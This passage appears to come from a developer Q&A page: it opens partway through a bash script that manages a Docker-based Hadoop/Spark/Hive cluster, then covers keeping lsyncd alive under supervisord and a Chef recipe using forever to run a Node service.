echo "DFS Health # nodemaster : http://172.18.1.1:50070/dfshealth"
echo "MR-JobHistory Server # nodemaster : http://172.18.1.1:19888"
echo "Spark info # nodemaster : http://172.18.1.1:8080"
echo "Spark History Server # nodemaster : http://172.18.1.1:18080"
}
function stopServices {
echo ">> Stopping Spark Master and slaves ..."
docker exec -u hadoop -d nodemaster stop-master.sh
docker exec -u hadoop -d node2 stop-slave.sh
docker exec -u hadoop -d node3 stop-slave.sh
echo ">> Stopping containers ..."
docker stop nodemaster node2 node3 psqlhms
}
if [[ $1 = "start" ]]; then
docker network create --subnet=172.18.0.0/16 hadoopnet # create custom network
# Starting Postresql Hive metastore
echo ">> Starting postgresql hive metastore ..."
docker run -d --net hadoopnet --ip 172.18.1.4 --hostname psqlhms --name psqlhms -it postgresql-hms
sleep 5
# 3 nodes
echo ">> Starting nodes master and worker nodes ..."
docker run -d --net hadoopnet --ip 172.18.1.1 --hostname nodemaster -p 9083:9083 -p 9000:9000 -p 7077:7077 -p 8080:8080 -p 8088:8088 -p 50070:50070 -p 6066:6066 -p 4040:4040 -p 20002:20002 --add-host node2:172.18.1.2 --add-host node3:172.18.1.3 --name nodemaster -it hive
docker run -d --net hadoopnet --ip 172.18.1.2 --hostname node2 -p 8081:8081 --add-host nodemaster:172.18.1.1 --add-host node3:172.18.1.3 --name node2 -it spark
docker run -d --net hadoopnet --ip 172.18.1.3 --hostname node3 -p 8082:8081 --add-host nodemaster:172.18.1.1 --add-host node2:172.18.1.2 --name node3 -it spark
# Format nodemaster
echo ">> Formatting hdfs ..."
docker exec -u hadoop -it nodemaster hdfs namenode -format
startServices
exit
fi
if [[ $1 = "stop" ]]; then
stopServices
docker rm nodemaster node2 node3 psqlhms
docker network rm hadoopnet
exit
fi
if [[ $1 = "uninstall" ]]; then
stopServices
docker rmi hadoop spark hive postgresql-hms -f
docker network rm hadoopnet
docker system prune -f
exit
fi
echo "Usage: cluster.sh start|stop|uninstall"
echo " start - start existing containers"
echo " stop - stop running processes"
echo " uninstall - remove all docker images"
I'm trying to run my lsynd's script with supervisord in order to have it always run.
I've coded this conf for my supervisor
[program:autostart_lsyncd]
command=bash -c "lsyncd /home/sync/lsyncd_script.lua"
autostart=true
autorestart=unexpected
numprocs=1
startsecs = 0
stderr_logfile=/var/log/autostart_sync.err.log
stdout_logfile=/var/log/autostart_sync.out.log
Script runs ok at startup but it exits always
2018-04-09 09:48:49,638 INFO success: autostart_lsyncd entered RUNNING state, process has stayed up for > than 0 seconds (startsecs)
2018-04-09 09:48:49,639 INFO exited: autostart_lsyncd (exit status 0; expected)
I can't understand if this is the correct way to keep alive a lsynd script or not.
Suggestions?
I'm using this configuration to supervisord in file /etc/supervisor/conf.d/lsyncd.conf
[program:lsyncd]
command=/usr/bin/lsyncd -nodaemon /etc/lsyncd/lsyncd.conf.lua
autostart=true
autorestart=unexpected
startretries=3
And this configuration to lsyncd (/etc/lsyncd/lsyncd.conf.lua):
settings {
logfile = "/var/log/lsyncd/lsyncd.log",
statusFile = "/var/log/lsyncd/lsyncd.status"
}
sync {
default.rsync,
source="/var/www/html/sites/default/files",
target="root#cdn:/var/www/html/sites/default/files",
exclude = {"*.php", "*.po", "\.ht*"},
rsync = {
archive = false,
acls = false,
compress = true,
links = false,
owner = false,
perms = false,
verbose = true,
rsh = "/usr/bin/ssh -p 22 -o StrictHostKeyChecking=no"
}
}
Also I had configure ssh keys and install rsync in the servers.
I'm trying to launch a node process as a service using forever, but the configuration is not working correctly. What's wrong with it?
execute "npm install -g forever"
restart_command_string = "forever restart /#{studio_server_folder}/#{studio_server_script}"
reload_command_string = "forever restart /#{studio_server_folder}/#{studio_server_script}"
start_command_string = "forever start /#{studio_server_folder}/#{studio_server_script}"
stop_command_string = "forever stop /#{studio_server_folder}/#{studio_server_script}"
status_command_string = "if [ $(forever list | grep -c \"studio-server\") -gt 0 ]; then echo 1; else echo 0; fi"
# execute "if [ $(forever list | grep -c \"studio-server\") -gt 0 ]; then #{restart_command_string}; else #{start_command}; fi"
service 'studio-server' do
supports :status => true, :restart => true, :reload => true
start_command start_command_string
reload_command reload_command_string
stop_command stop_command_string
status_command status_command_string
restart_command restart_command_string
action [:start]
end
execute 'service --status-all >> /servicestatus'
That status command isn't a command, it is a fragment of bash script and thus is unlikely to be working. In general I would highly recommend using a real service manager like supervisord or systemd.